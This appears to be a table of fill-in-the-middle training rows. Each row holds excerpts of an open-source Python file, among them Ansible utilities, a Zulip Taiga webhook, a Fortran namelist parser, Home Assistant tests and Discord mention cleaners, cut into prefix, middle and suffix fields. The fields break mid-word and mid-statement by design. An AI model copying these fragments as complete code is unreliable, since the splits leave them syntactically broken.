repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
ProjectSWGCore/NGECore2
|
scripts/mobiles/generic/faction/rebel/battle_droid_rebel.py
|
Python
|
lgpl-3.0
| 1,397
| 0.029349
|
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from resources.datatables import FactionStatus
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('rebel_battle_droid')
mobileTemplate.setLevel(83)
mobileTemplate.setDifficulty(Difficulty.ELITE)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(True)
mobileTemplate.setScale(1)
mobileTemplate.setSocialGroup("rebel")
mobileTemplate.setAssistRange(24)
mobileTemplate.setStalker(False)
mobileTemplate.setFaction("rebel")
mobileTemplate.setFactionStatus(FactionStatus.Combatant)
templates = Vector()
templates.add('object/mobile/shared_battle_droid.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/ranged/carbine/shared_carbine_e5.iff', Weap
|
onType.CARBINE, 1.0, 15, 'energy')
weaponTemplates.add(weapontemplate)
mobileTe
|
mplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('rangedShot')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('battle_droid_rebel', mobileTemplate)
return
|
muravjov/ansible
|
lib/ansible/utils/__init__.py
|
Python
|
gpl-3.0
| 60,718
| 0.004957
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import errno
import sys
import re
import os
import shlex
import yaml
import copy
import optparse
import operator
from ansible import errors
from ansible import __version__
from ansible.utils.display_functions import *
from ansible.utils.plugins import *
from ansible.utils.su_prompts import *
from ansible.utils.hashing import secure_hash, secure_hash_s, checksum, checksum_s, md5, md5s
from ansible.callbacks import display
from ansible.module_utils.splitter import split_args, unquote
from ansible.module_utils.basic import heuristic_log_sanitize
from ansible.utils.unicode import to_bytes, to_unicode
import ansible.constants as C
from . import pybook
import ast
import pprint
import time
import StringIO
import stat
import termios
import tty
import pipes
import random
import difflib
import warnings
import traceback
import getpass
import sys
import subprocess
import contextlib
from vault import VaultLib
VERBOSITY=0
MAX_FILE_SIZE_FOR_DIFF=1*1024*1024
# caching the compilation of the regex used
# to check for lookup calls within data
LOOKUP_REGEX = re.compile(r'lookup\s*\(')
PRINT_CODE_REGEX = re.compile(r'(?:{[{%]|[%}]})')
CODE_REGEX = re.compile(r'(?:{%|%})')
try:
# simplejson can be much faster if it's available
import simplejson as json
except ImportError:
import json
try:
from yaml import CSafeLoader as
|
Loader
exce
|
pt ImportError:
from yaml import SafeLoader as Loader
PASSLIB_AVAILABLE = False
try:
import passlib.hash
PASSLIB_AVAILABLE = True
except:
pass
try:
import builtin
except ImportError:
import __builtin__ as builtin
KEYCZAR_AVAILABLE=False
try:
try:
# some versions of pycrypto may not have this?
from Crypto.pct_warnings import PowmInsecureWarning
except ImportError:
PowmInsecureWarning = RuntimeWarning
with warnings.catch_warnings(record=True) as warning_handler:
warnings.simplefilter("error", PowmInsecureWarning)
try:
import keyczar.errors as key_errors
from keyczar.keys import AesKey
except PowmInsecureWarning:
system_warning(
"The version of gmp you have installed has a known issue regarding " + \
"timing vulnerabilities when used with pycrypto. " + \
"If possible, you should update it (i.e. yum update gmp)."
)
warnings.resetwarnings()
warnings.simplefilter("ignore")
import keyczar.errors as key_errors
from keyczar.keys import AesKey
KEYCZAR_AVAILABLE=True
except ImportError:
pass
###############################################################
# Abstractions around keyczar
###############################################################
def key_for_hostname(hostname):
# fireball mode is an implementation of ansible firing up zeromq via SSH
# to use no persistent daemons or key management
if not KEYCZAR_AVAILABLE:
raise errors.AnsibleError("python-keyczar must be installed on the control machine to use accelerated modes")
key_path = os.path.expanduser(C.ACCELERATE_KEYS_DIR)
if not os.path.exists(key_path):
os.makedirs(key_path, mode=0700)
os.chmod(key_path, int(C.ACCELERATE_KEYS_DIR_PERMS, 8))
elif not os.path.isdir(key_path):
raise errors.AnsibleError('ACCELERATE_KEYS_DIR is not a directory.')
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_DIR_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the private key directory. Use `chmod 0%o %s` to correct this issue, and make sure any of the keys files contained within that directory are set to 0%o' % (int(C.ACCELERATE_KEYS_DIR_PERMS, 8), C.ACCELERATE_KEYS_DIR, int(C.ACCELERATE_KEYS_FILE_PERMS, 8)))
key_path = os.path.join(key_path, hostname)
# use new AES keys every 2 hours, which means fireball must not allow running for longer either
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
key = AesKey.Generate()
fd = os.open(key_path, os.O_WRONLY | os.O_CREAT, int(C.ACCELERATE_KEYS_FILE_PERMS, 8))
fh = os.fdopen(fd, 'w')
fh.write(str(key))
fh.close()
return key
else:
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_FILE_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the key file for this host. Use `chmod 0%o %s` to correct this issue.' % (int(C.ACCELERATE_KEYS_FILE_PERMS, 8), key_path))
fh = open(key_path)
key = AesKey.Read(fh.read())
fh.close()
return key
def encrypt(key, msg):
return key.Encrypt(msg)
def decrypt(key, msg):
try:
return key.Decrypt(msg)
except key_errors.InvalidSignatureError:
raise errors.AnsibleError("decryption failed")
###############################################################
# UTILITY FUNCTIONS FOR COMMAND LINE TOOLS
###############################################################
def read_vault_file(vault_password_file):
"""Read a vault password from a file or if executable, execute the script and
retrieve password from STDOUT
"""
if vault_password_file:
this_path = os.path.realpath(os.path.expanduser(vault_password_file))
if is_executable(this_path):
try:
# STDERR not captured to make it easier for users to prompt for input in their scripts
p = subprocess.Popen(this_path, stdout=subprocess.PIPE)
except OSError, e:
raise errors.AnsibleError("problem running %s (%s)" % (' '.join(this_path), e))
stdout, stderr = p.communicate()
vault_pass = stdout.strip('\r\n')
else:
try:
f = open(this_path, "rb")
vault_pass=f.read().strip()
f.close()
except (OSError, IOError), e:
raise errors.AnsibleError("Could not read %s: %s" % (this_path, e))
return vault_pass
else:
return None
def err(msg):
''' print an error message to stderr '''
print >> sys.stderr, msg
def exit(msg, rc=1):
''' quit with an error to stdout and a failure code '''
err(msg)
sys.exit(rc)
def jsonify(result, format=False):
''' format JSON output (uncompressed or uncompressed) '''
if result is None:
return "{}"
result2 = result.copy()
for key, value in result2.items():
if type(value) is str:
result2[key] = value.decode('utf-8', 'ignore')
indent = None
if format:
indent = 4
try:
return json.dumps(result2, sort_keys=True, indent=indent, ensure_ascii=False)
except UnicodeDecodeError:
return json.dumps(result2, sort_keys=True, indent=indent)
def write_tree_file(tree, hostname, buf):
''' write something into treedir/hostname '''
# TODO: might be nice to append playbook runs per host in a similar way
# in which case, we'd want append mode.
path = os.path.join(tree, hostname)
fd = open(path, "w+")
fd.write(buf)
fd.close()
def is_failed(result):
''' is a given JSON result a failed result? '''
return ((result.get('rc', 0) != 0) or (result.get('failed', False) in [ True, 'True', 'true']))
def is_changed(result):
''' is a given JSON result a changed result? '''
return (result.get('changed', False) in [ True, 'True', 'true'])
|
Diptanshu8/zulip
|
zerver/views/webhooks/taiga.py
|
Python
|
apache-2.0
| 11,660
| 0.00446
|
"""
Taiga integration for Zulip.
Tips for notification output:
*Emojis*: most of the events have specific emojis e.g.
- :notebook: - change of subject/name/description
- :chart_with_upwards_trend: - change of status
etc. If no there's no meaningful emoji for certain event, the defaults are used:
- :thought_balloon: - event connected to commenting
- :busts_in_silhouette: - event connected to a certain user
- :package: - all other events connected to user story
- :calendar: - all other events connected to milestones
- :clipboard: - all other events connected to tasks
- :bulb: - all other events connected to issues
*Text formatting*: if there has been a change of a property, the new value should always be in bold; otherwise the
subject of US/task should be in bold.
"""
from __future__ import absolute_import
from typing import Any, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.http import HttpRequest, HttpResponse
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success, json_error
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile, Client
import ujson
from six.moves import range
@api_key_only_webhook_view('Taiga')
@has_request_variables
def api_taiga_webhook(request, user_profile, client, message=REQ(argument_type='body'),
stream=REQ(default='taiga'), topic=REQ(default='General')):
# type: (HttpRequest, UserProfile, Client, Dict[str, Any], Text, Text) -> HttpResponse
parsed_events = parse_message(message)
content_lines = []
for event in parsed_events:
content_lines.append(generate_content(event) + '\n')
content = "".join(sorted(content_lines))
check_send_message(user_profile, client, 'stream', [stream], topic, content)
return json_success()
templates = {
'userstory': {
'create': u':package: %(user)s created user story **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned user story **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned user story **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned user story **%(subject)s**'
' from %(old)s to %(new)s.',
'points': u':game_die: %(user)s changed estimation of user story **%(subject)s**.',
'blocked': u':lock: %(user)s blocked user story **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked user story **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added user story **%(subject)s** to sprint %(new)s.',
'unset_milestone': u':calendar: %(user)s removed user story **%(subject)s** from sprint %(old)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of user story **%(subject)s** from %(old)s'
' to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of user story **%(subject)s**'
' from %(old)s to %(new)s.',
'closed': u':checkered_flag: %(user)s closed user story **%(subject)s**.',
'reopened': u':package: %(user)s reopened user story **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed user story from %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of user story **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on user story **%(subject)s**.',
'delete': u':x: %(user)s deleted user story **%(subject)s**.'
},
'milestone': {
'create': u':calendar: %(user)s created sprint **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed sprint from %(old)s to **%(new)s**.',
'estimated_start': u':calendar: %(user)s changed estimated start of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'estimated_finish': u':calendar: %(user)s changed estimated finish of sprint **%(subject)s**'
|
' from %(old)s to %(new)s.',
'delete': u':x: %(user)s deleted sprint **%(subject)s**.'
},
'task': {
'create': u':clipboard: %(user)s created task **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned task **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned task **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned t
|
ask **%(subject)s**'
' from %(old)s to %(new)s.',
'blocked': u':lock: %(user)s blocked task **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked task **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added task **%(subject)s** to sprint %(new)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of task **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of task **%(subject)s**'
' from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed task %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of task **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on task **%(subject)s**.',
'delete': u':x: %(user)s deleted task **%(subject)s**.',
'changed_us': u':clipboard: %(user)s moved task **%(subject)s** from user story %(old)s to %(new)s.'
},
'issue': {
'create': u':bulb: %(user)s created issue **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned issue **%(subject)s** to %(new)s.', #
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned issue **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_priority': u':rocket: %(user)s changed priority of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_severity': u':warning: %(user)s changed severity of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_type': u':bulb: %(user)s changed type of issue **%(subject)s** from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed issue %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of issue **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on issue **%(subject)s**.',
'delete': u':x: %(user)s deleted issue **%(subject)s**.'
},
}
def get_old_and_new_values(change_type, message):
# type: (str, Mapping[str, Any]) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]]]
""" Parses the payload and finds previous and current value of change_type."""
if change_type in ['subject', 'name', 'estimated_finish', 'estimated_start']:
old = message["change"]["diff"][change_type]["from"]
new = message["change"]["diff"][change_type]["to"]
return old, new
try:
old = message["change"]["diff"][change_type]["from"]
except KeyError:
old = None
try:
new = message["change"]["diff"][change_type]["to"]
except KeyError:
new = None
return old, new
def parse_comment(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses the comment to issue, task or US. """
return {
'event': 'commented',
'type': message["type"],
'values': {
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_create_or_delete(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses create or delete event. """
return {
'type': message["type"],
'event': message["action"],
'values':
{
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
d
|
rht/universe
|
universe/remotes/compose/colors.py
|
Python
|
mit
| 860
| 0
|
from __future__ import absolute_import
from __
|
future__ import unicode_literals
NAMES = [
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
def get_pairs():
for i, name in enumerate(NAMES):
yield(name, str(30 + i))
yield('intense_' + name, str(30 + i) + ';1')
def ansi(code):
return '\033[{0}m'.format(code)
def ansi_color(code, s):
return '{0}{1}{2}'.format(ansi(code),
|
s, ansi(0))
def make_color_fn(code):
return lambda s: ansi_color(code, s)
for (name, code) in get_pairs():
globals()[name] = make_color_fn(code)
def rainbow():
cs = ['cyan', 'yellow', 'green', 'magenta', 'red', 'blue',
'intense_cyan', 'intense_yellow', 'intense_green',
'intense_magenta', 'intense_red', 'intense_blue']
for c in cs:
yield globals()[c]
|
DTUWindEnergy/Python4WindEnergy
|
py4we/fortran_namelist_io.py
|
Python
|
apache-2.0
| 8,294
| 0.01278
|
""" IO classes for Omnivor input file
Copyright (C) 2013 DTU Wind Energy
Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013
Namelist IO: badis functions to read and parse a fortran file into python dictonary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
__author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
__version__ = '$Revision: 1.0 $'[11:-2]
__date__ = '$Date: 2006/09/05 21:16:24 $'
__copyright__ = 'Copyright (c) 2006 RPN'
__license__ = 'LGPL'
Recognizes files of the form:
&namelistname
opt1 = value1
...
/
"""
from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest
import numpy as np
import os.path as path
import sys
import re
import tempfile
import os
__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
"""
Fortran Namelist IO class
Scan a Fortran Namelist file and put Section/Parameters into a dictionary
Write the file back if needed.
"""
def _write(self):
""" Write a file (overrided)
"""
with open(self.filename, 'w') as f:
for nml in self.data :
f.write('&'+nml+'\n')
# Sorting dictionary data (in the same order as it was created, thanks to id)
SortedList = sorted(self.data[nml].items(), key=lambda(k, v): v['id'])
# for param in self.data[nml]:
for param in map(lambda(k,v):k,SortedList):
f.write(param+'='+','.join(sel
|
f.data[nml][param]['val']))
if len(self.data[nml][param]['com']) >0:
f.write(' !'+self.data[nml][param]['com'])
f.write('\n')
f.write('/\n')
def _read(self):
""" Read the file (overrided)
"""
with open(self.filename, 'r') as f:
data = f.read()
varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
valueI
|
nt = re.compile(r'[+-]?[0-9]+')
valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
valueNumber = re.compile(r'\b(([\+\-]?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
spaces = r'[\s\t]*'
quote = re.compile(r"[\s\t]*[\'\"]")
namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")
#split sections/namelists
mynmlfile = {}
mynmlfileRaw = {}
mynmlname = ''
for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
if re.match(namelistname,item):
mynmlname = re.sub(namelistname,r"\1",item)
mynmlfile[mynmlname] = {}
mynmlfileRaw[mynmlname] = []
elif re.match(namlistend,item):
mynmlname = ''
else:
if mynmlname:
mynmlfileRaw[mynmlname].append(item)
#parse param in each section/namelist
for mynmlname in mynmlfile.keys():
#split strings
bb = []
for item in mynmlfileRaw[mynmlname]:
if item[0]!='!':
# discarding lines that starts with a comment
bb.extend(FortranNamelistIO.splitstring(item))
#split comma and =
aa = []
for item in bb:
if not re.match(quote,item):
aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
# aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
else:
aa.append(item)
del(bb)
aa = FortranNamelistIO.clean(aa,cleancomma=1)
myparname = ''
id_cum=0
for item in aa:
if re.search(paramname,item):
#myparname = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
myparname = re.sub(paramname,r"\1",item)
id_cum=id_cum+1
mynmlfile[mynmlname][myparname] = {
'val' : [],
'id' : id_cum,
'com' : ''
}
elif paramname:
# Storing comments
item2=item.split('!')
item=item2[0]
if len(item) > 1 :
mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
if re.match(valueBool,item):
if re.match(valueTrue,item):
mynmlfile[mynmlname][myparname]['val'].append('.true.')
else:
mynmlfile[mynmlname][myparname]['val'].append('.false.')
else:
# item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
mynmlfile[mynmlname][myparname]['val'].append(item.strip())
self.data=mynmlfile
# Accessor and mutator dictionary style
def __getitem__(self, key):
""" Transform the class instance into a dictionary."""
return self.data[key]
def __setitem__(self, key, value):
""" Transform the class instance into a dictionary."""
self.data[key] = value
#==== Helper functions for Parsing of files
@staticmethod
def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
"""
Remove leading and trailing blanks, comments/empty lines from a list of strings
mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
commentline: definition of commentline
spacemerge: if <>0, merge/collapse multi space
cleancomma: Remove leading and trailing commas
"""
aa = mystringlist
if cleancomma:
aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
if commentexpr:
aa = [re.sub(commentexpr,"",item).strip() for item in aa]
if spacemerge:
aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) <> 0]
else:
aa = [item.strip() for item in aa if len(item.strip()) <> 0]
return aa
@staticmethod
def splitstring(mystr):
"""
Split a string in a list of strings at quote boundaries
Input: String
Output: list of strings
"""
dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
#remove zerolenght items
mystrarr = [item for item in mystrarr if len(item) <> 0]
if len(mystrarr) > 1:
mystrarr2 = []
for item in mystrarr:
mystrarr2.extend(FortranNamelistIO.splitstring(item))
mystrarr = mystrarr2
return mystrarr
## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
""" Test class for MyFileType class """
test_file = './test/fortran/fortran_namelist.nml'
def test_output_identical(self):
InputFile=FortranNamelistIO(self.test_file)
test_fileout=tempfile.mkstemp()[1]
InputFile.write(test_fileout)
with open(self.test_file, 'r') as f:
data_expected = f.read()
with open(test_fileout, 'r') as f:
data_read = f.read()
try:
self.assertMultiLineEqual(data_read, data_expected)
finally:
os.remove(test_fileout)
def test_duplication(self):
self._test_duplication(FortranNamelistIO, self.test_file)
## Main function ---------------------------------------------------------
if __name__
|
jawilson/home-assistant
|
tests/components/nws/test_config_flow.py
|
Python
|
apache-2.0
| 3,482
| 0
|
"""Test the National Weather Service (NWS) config flow."""
from unittest.mock import patch
import aiohttp
from homeassistant import config_entries
from homeassistant.components.nws.const import DOMAIN
async def test_form(hass, mock_simple_nws_config):
"""Test we get the form."""
hass.config.latitude = 35
hass.config.longitude = -90
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], {"api_key": "test"}
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "ABC"
assert result2["data"] == {
"api_key": "test",
"latitude": 35,
"longitude": -90,
"station": "ABC",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass, mock_simple_nws_config):
"""Test we handle cannot connect error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = aiohttp.ClientError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_error(hass, mock_simple_nws_config):
"""Test we handle unknown error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = ValueError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_already_configured(hass, mock_simple_nws_config):
"""Test we handle duplicate entries."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
|
{"api_key": "test"},
)
await hass.async_bloc
|
k_till_done()
assert result2["type"] == "create_entry"
assert len(mock_setup_entry.mock_calls) == 1
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == 0
|
gems-uff/noworkflow
|
tests/test_disasm.py
|
Python
|
mit
| 831
| 0.002407
|
def f(x=2):
return x
lis = [1]
dic = {
"x": 2
}
f(1) # call_function
f(*lis) # call_function_var
f(**dic) # call_function_kw
f(*[], **dic) # call_funct
|
ion_var_kw
class C(object): # call_function
def __enter__(self):
x = 1
return x
def __exit__(self, *args, **kwargs):
pass
def fn_dec(*args):
def dec(fn):
return fn
|
return dec
dec1 = fn_dec("1")
@fn_dec("2") # call_function
@dec1 # call_function
def fw(x):
return x
@fn_dec("2") # call_function
@dec1 # call_function
class D(object):
pass
[a for a in lis] # nothing
{a for a in lis} # call_function
{a: a for a in lis} # call_function
f(a for a in lis) # call_function gen, call_function
with C() as r: # WITH_CLEANUP
pass
assert True # nothing
assert True, "wat" # call_function
|
apache/incubator-systemml
|
src/main/python/systemds/operator/algorithm/builtin/getAccuracy.py
|
Python
|
apache-2.0
| 1,549
| 0.002582
|
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
#
|
with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language govern
|
ing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
|
guineawheek/Dozer
|
dozer/utils.py
|
Python
|
gpl-3.0
| 2,868
| 0.003138
|
"""Provides some useful utilities for the Discord bot, mostly to do with cleaning."""
import re
import discord
__all__ = ['clean', 'is_clean']
mass_mention = re.compile('@(everyone|here)')
member_mention = re.compile(r'<@\!?(\d+)>')
role_mention = re.compile(r'<@&(\d+)>')
channel_mention = re.compile(r'<#(\d+)>')
|
def clean(ctx, text=None, *, mass=True, member=True, role=True, channel=True):
"""Cleans the message of anything specified in the parameters passed."""
if text is None:
text = ctx.mess
|
age.content
if mass:
cleaned_text = mass_mention.sub(lambda match: '@\N{ZERO WIDTH SPACE}' + match.group(1), text)
if member:
cleaned_text = member_mention.sub(lambda match: clean_member_name(ctx, int(match.group(1))), cleaned_text)
if role:
cleaned_text = role_mention.sub(lambda match: clean_role_name(ctx, int(match.group(1))), cleaned_text)
if channel:
cleaned_text = channel_mention.sub(lambda match: clean_channel_name(ctx, int(match.group(1))), cleaned_text)
return cleaned_text
def is_clean(ctx, text=None):
"""Checks if the message is clean already and doesn't need to be cleaned."""
if text is None:
text = ctx.message.content
return all(regex.search(text) is None for regex in (mass_mention, member_mention, role_mention, channel_mention))
def clean_member_name(ctx, member_id):
"""Cleans a member's name from the message."""
member = ctx.guild.get_member(member_id)
if member is None:
return '<@\N{ZERO WIDTH SPACE}%d>' % member_id
elif is_clean(ctx, member.display_name):
return member.display_name
elif is_clean(ctx, str(member)):
return str(member)
else:
return '<@\N{ZERO WIDTH SPACE}%d>' % member.id
def clean_role_name(ctx, role_id):
"""Cleans role pings from messages."""
role = discord.utils.get(ctx.guild.roles, id=role_id) # Guild.get_role doesn't exist
if role is None:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role_id
elif is_clean(ctx, role.name):
return '@' + role.name
else:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role.id
def clean_channel_name(ctx, channel_id):
"""Cleans channel mentions from messages."""
channel = ctx.guild.get_channel(channel_id)
if channel is None:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel_id
elif is_clean(ctx, channel.name):
return '#' + channel.name
else:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel.id
def pretty_concat(strings, single_suffix='', multi_suffix=''):
"""Concatenates things in a pretty way"""
if len(strings) == 1:
return strings[0] + single_suffix
elif len(strings) == 2:
return '{} and {}{}'.format(*strings, multi_suffix)
else:
return '{}, and {}{}'.format(', '.join(strings[:-1]), strings[-1], multi_suffix)
|
armab/st2contrib
|
packs/jira/actions/transition_issue.py
|
Python
|
apache-2.0
| 269
| 0
|
from lib.base import BaseJiraAction
__all__ = [
'TransitionJiraIssueAc
|
tion'
]
class TransitionJiraIssueAction(BaseJiraActi
|
on):
def run(self, issue_key, transition):
result = self._client.transition_issue(issue_key, transition)
return result
|
jacksarick/My-Code
|
Python/python challenges/euler/017_number_letter_counts.py
|
Python
|
mit
| 25
| 0.08
|
## Nee
|
d to find a library
| |
melvyn-sopacua/kdelibs
|
cmake/modules/FindPyQt.py
|
Python
|
gpl-2.0
| 1,768
| 0.001697
|
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Copyright (c) 2014, Raphael Kubo da Costa <rakuco@FreeBSD.org>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
import PyQt4.QtCore
import os
import sys
def get_default_sip_dir():
|
# This is based on QScintilla's configure.py, and only works for the
# default case where installation paths have not been changed in PyQt's
# configuration process.
if sys.platform == 'win32':
